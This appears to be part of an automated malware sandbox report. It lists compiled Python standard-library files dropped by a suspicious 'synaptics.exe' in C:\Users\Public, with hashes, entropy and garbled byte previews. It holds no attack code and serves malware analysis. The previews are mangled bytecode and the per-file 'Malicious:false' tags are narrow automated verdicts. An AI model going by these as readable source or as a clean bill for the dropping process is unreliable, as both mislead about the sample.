                                                                                                                                                                                      Preview:o........'-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....0C:\Users\Public\QExvbmVOb25l\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on file
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3560
                                                                                                                                                                                      Entropy (8bit):5.07663630249693
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:PLsOn3Ch9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:PLs8Cfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                      MD5:02B08A8777898FFA63ACE79933840EDE
                                                                                                                                                                                      SHA1:B66A6C781D353645B60490807B73F20AD2202A63
                                                                                                                                                                                      SHA-256:CA83A1ADD4CF3E79B662FF8FC0A094B9D68A186DDA6619BB3758503FF20EAB09
                                                                                                                                                                                      SHA-512:51AA92D4C58B06380F18328ABAAC72284717A821B0FDF08309C66D3BEEAC13D6F7B20740EC1B7DD7D8B174F6AEE68595AEA1A4E88ED1083CA20986606284A483
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....1C:\Users\Public\QExvbmVOb25l\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for prin
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7621
                                                                                                                                                                                      Entropy (8bit):4.6115045510590225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6oIAmOjav3ze0qLnKFHWpLiEEskjXoNizml+Ws2w13TvqcJlnqJEqBTgztqetKHs:3IAbj236LTKF2pLiE3kjXoEzml+Ws2wV
                                                                                                                                                                                      MD5:A93DBD13CC36FB1CF8CC9B7081F3AA19
                                                                                                                                                                                      SHA1:937C31A6577EA326A12A3FA28A1B079CBFB8C835
                                                                                                                                                                                      SHA-256:F1FDC082CF96C8065C324AC72B43E20C037DE7BFD555BCD9CBA53B8305A70066
                                                                                                                                                                                      SHA-512:0E2C9C67B531C5A4E04B842CF353452BC285370BCFDA1A58A90A9E5E20E658F0CA72E382679897920D8990398C29E8B3EEC385F15B32A625714B738843F9BDCC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r...../C:\Users\Public\QExvbmVOb25l\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6764
                                                                                                                                                                                      Entropy (8bit):5.125302554277043
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ic2+dPAF6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:j2+dPPMGxYtag2VXLk5ewc
                                                                                                                                                                                      MD5:F652B2BE95086C5A295D33B907313E7D
                                                                                                                                                                                      SHA1:3C9BA26D01695AADB1DBA32753D3D1BAC28CC3FD
                                                                                                                                                                                      SHA-256:3E8DD6D0013BA0FEF3B2A80D5744289E3C62E34F07427E5A44E7A16F7DC6C772
                                                                                                                                                                                      SHA-512:6CCA9D47DAA7CE216078E7E63D304D040CAECE6B110CB30C6FE639EEB40F0E07753633AD8C332CD26ECC06095CED73C01ED31E240BCD858F377D1B2FD38E2A2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....'C:\Users\Public\QExvbmVOb25l\lib\abc.py..ab
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):55752
                                                                                                                                                                                      Entropy (8bit):5.278446087691415
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:v4tQGlgD7UjM0gB2ze0GIHimylhWNbflS8rHKMAsSbUgUU0/9eKQddNhvDqIUy7w:v4+GlgD7Uj4B2XNHehW7uVvuIlPgj
                                                                                                                                                                                      MD5:5BC5B230DC2A26F04CEE94AEC9F33158
                                                                                                                                                                                      SHA1:7A93B420BF777753170523A6A735F8D46A973E04
                                                                                                                                                                                      SHA-256:363954A7D63FCD4E9561A141DD7C8F7C5E25F8562EB9AE09CCE3106C8671D9AC
                                                                                                                                                                                      SHA-512:2C50F3711F6E8A2D9B809011C13225A0683A8D6A299A28EA0BC549193C93F79ADEE7788432D4B0833B1CE288E7971E689904494ED28365C545AF1224DFBFD4D1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d`d.d.d...d.d...Z.d.d...Z.dad.d...d.d...Z.d.d...Z.d.d...Z.dbd.d...Z.d.d...Z.d.d...Z.dcd.d...Z.d.d ..Z.d!d"..Z.d.d#..d$d%..Z.d&d'..Z.G.d(d)..d)e...Z.G.d*d+..d+e...Z.e.e.d,..s.d-d...Z.d/d0..Z.e.e.e...e._.e.e.e...e._.G.d1d2..d2e ..Z!d3d4..Z"G.d5d6..d6e.e!d7..Z#G.d8d9..d9e.e!d7..Z$G.d:d;..d;e.e!d7..Z%G.d<d=..d=e.e!d7..Z&G.d>d?..d?e.e!d7..Z'e#e(e)e*f.e$e+f.e%e,f.e&e d...e-f.e'e d@..f.i.Z.e#e-f.i.Z/e-d=e d...d=e(d6e)d6e*d6e+d9e,d;e d@..d?i.Z0G.dAdB..dBe1..Z2G.dCdD..dDe2..Z3G.dEdF..dFe2..Z4e.e5dG....s"dHdI..Z6dJdK..Z7e.e6e7..e5_8G.dLdM..dMe9..Z:G.dNdO..dOe;..Z<G.dPdQ..dQe;..Z=G.dRdS..dSe;..Z>dTe?e.j@jAd.......ZBG.dUdV..dVe...ZCdWZDdXZEg.eD..eE..R.ZFG.dYdZ..dZe...ZGd[d\..ZHd]d^..ZIeJd_k...ryeI....d.S.d.S.)daH.... ast. ~~~.. The `ast` module helps Python applications to process trees of the Python. abstract syntax grammar. The abstract syntax itself might change with. each Python re
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17175
                                                                                                                                                                                      Entropy (8bit):5.496809791634414
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:KZvQ1tayn9wBqXY71hITEOtuAk8CUSSYkXJ20RQa83hg9M6o0RzuQcT/zlNFs61V:4qay9wgo71hITOtHYP9M70xuzRNG61V3
                                                                                                                                                                                      MD5:9D08860527321B2AF680F9F02516272C
                                                                                                                                                                                      SHA1:A9F653311F52A3CA0EAD0CFA45D86D547A4FF71F
                                                                                                                                                                                      SHA-256:58A6CD8139E2D8E2E08D8AF2A159AB6E510A339568BB1DAEBF89A36A2B6FA127
                                                                                                                                                                                      SHA-512:0B6288767F558D5B3860EA6B0237727D021FF5E34205D4C1A79DA02C9AFB96AFDDDAC444C2F3EBEED45E91208572EE7850CB8506AECF22160F78B466BD5642BD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2601
                                                                                                                                                                                      Entropy (8bit):5.2176156290909645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:TChwHaPJ7Bn7V30EOCl7VU3OpOBn7B3wCLnCRl7VC39eV:TCh7Bx30EOC03OpOB93wGCRi34V
                                                                                                                                                                                      MD5:E347D2F2FAFE6B8C94ADCD8874825E9E
                                                                                                                                                                                      SHA1:3FE38B242A5BBE1DC656CB152AE65E9EED803DE5
                                                                                                                                                                                      SHA-256:93A4FB26F551AFFC901DD6E8A9647B13E1441893B77CA38CF089C3663A6CE0A9
                                                                                                                                                                                      SHA-512:6AD3AF2C2C6EE66CD4D2A4ADFA1A0E057A0FD002B249300F47C7E9704972D1AEF05F21F3B453AA5DD10FBED567B27C026D66BF5E3A2054D8C064626639379C55
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....*C:\Users\Public\QExvbmVOb25l\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <=
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10883
                                                                                                                                                                                      Entropy (8bit):5.273434895618239
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:66Eb2RL5RaQHzW6FVoDCGEUPIzSh/NHSN:3RL5RLpGPIzG/NyN
                                                                                                                                                                                      MD5:67F18F8BF51412363C99EF09481528B9
                                                                                                                                                                                      SHA1:53C69583DE5B514EEED0A42CCB3BF9909A4D2708
                                                                                                                                                                                      SHA-256:CEB4FF349FC848D3386257E60D5AA336F5917F0E6E81C3E99EF6DA6AD444D800
                                                                                                                                                                                      SHA-512:37E2626B2DCAF4EF78C7AD3FFA2AD1212C80EFBF75671247FF65CE2DA670254E253551479A2ECC23C1217850C6811FE1117AB165C04B092CBFD8F70975F0F3F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26316
                                                                                                                                                                                      Entropy (8bit):5.2318516322769195
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:qLfNsz3TQClly8bR9PS2qYRhWmBM2A9M/PNKGH:qhmHS2qgw29KGH
                                                                                                                                                                                      MD5:6F6346D8B7485E409B6C121B774CDF63
                                                                                                                                                                                      SHA1:4560BC78FA6A965C5DDC0BC639732DBAB041B9BF
                                                                                                                                                                                      SHA-256:C47DB162E02835DB74757FD6B72B0B252F2D0D640D53071F922B957ACE68EA80
                                                                                                                                                                                      SHA-512:93ABC0ABD4CADDA418CCB60BAE643D56789826B1F0BE44D6D7102C1668F33EFCC0B2E69E0EC9C26141EE323D974943D2468357ADC0CD1FBB639680E0F0680F22
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33232
                                                                                                                                                                                      Entropy (8bit):5.022164527801481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:5v/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:5hUkFrOZwENNflPKPBxKa
                                                                                                                                                                                      MD5:6FA6A65F71E94B617C6B09F550AFB1A5
                                                                                                                                                                                      SHA1:493D5DBD8BB4907A8F5D6968A5585BE0F597DF93
                                                                                                                                                                                      SHA-256:47519EA63915306DAC39CF06D22ACFE336D2E0AD55022FC8A9BB1370D55E9F58
                                                                                                                                                                                      SHA-512:34E6FB9A37E373B036ED005C2EB9A8AA22582D3D66C45C9382D281D332DA9C78A4E491AD6ED8831F21456FA42C1BDCF09268377991F116AE76E44ED16E442DC1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20908
                                                                                                                                                                                      Entropy (8bit):5.083956166779034
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rrfHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:vfHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                      MD5:FB239E9BB3DB1B804BA6CEC9D6633670
                                                                                                                                                                                      SHA1:EB3AD57CDADBF29A9539D83EAA6B3263DD51E817
                                                                                                                                                                                      SHA-256:CDA6B84A2CCD746721405BC4021721BE9DABF44D04BBDEB80E39157448CEE31B
                                                                                                                                                                                      SHA-512:AF45A4B34964D4C7F958A6481E103831B660CF664FE72FC3D7E324D3000292AD8FD3A815D66E1F21BF53D6CDBB1FDBA2038B31CA8804A5344724585CAF23D4F1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r......C:
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7009
                                                                                                                                                                                      Entropy (8bit):5.42128193557331
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:lxPakDZxS5GXVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:Pa0/S5GlcR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                      MD5:8A6882910EFF4F8BCDDEBEA1A635DF0B
                                                                                                                                                                                      SHA1:57BB8DE367A62564558E2A3316077A6DD49E0445
                                                                                                                                                                                      SHA-256:D3B997323BF5D5DBA53F0D5C94F608FD8358DF1EDDCC6CACB542514676E973C8
                                                                                                                                                                                      SHA-512:523D910548F98ABEBA52779B9EEB05D3B69B0C1DDD21C46C048DE90597AFF062C7468E01EB9EDA6C906BF59B330049C08C455EB890AEE253246B3AF9A932AC3E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4696
                                                                                                                                                                                      Entropy (8bit):5.303895801025462
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ZCI7QMLHGjZ99X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:HvHGTBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                      MD5:4956B984789B3AD8CADD785E32F6FBDA
                                                                                                                                                                                      SHA1:33C23B1CB5AF3775A19858ABF80E0523C14314A6
                                                                                                                                                                                      SHA-256:FC9898F699ADF969F40BF7E4AEAB254B8616B90D79ED18B8111473B63D1DBCA8
                                                                                                                                                                                      SHA-512:C0EDEE3095EB4024FCA2573E28FC51E6A1546072CA7299CD8CAE05163EE45676B9903CA1B8B07137E95BE06116ABF7DC1BCBEF95EBD651B42AEB5F97BBA905F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....+C:\Users\Public\QExvbmVOb25l\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11811
                                                                                                                                                                                      Entropy (8bit):5.44611565753646
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WJq1+BG5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:WJqJLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                      MD5:8478D69950654B565547F512ECB134FE
                                                                                                                                                                                      SHA1:17E227E0F1F7CEDA398E7686366E65842DBE4871
                                                                                                                                                                                      SHA-256:857FB4AFFE24A3C2832216CDA181338D5469A5B6A9D02DBC4D97C5008EFAC260
                                                                                                                                                                                      SHA-512:2FEF72AB585D43E98F939F4EF328B773016929ACC1C8B94E94C0C3CD735A7F71D9413F7F2592BCE6884688C5E22FB7F93D1AB0DB4FF2B2227DF05C5DC0F86CE3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
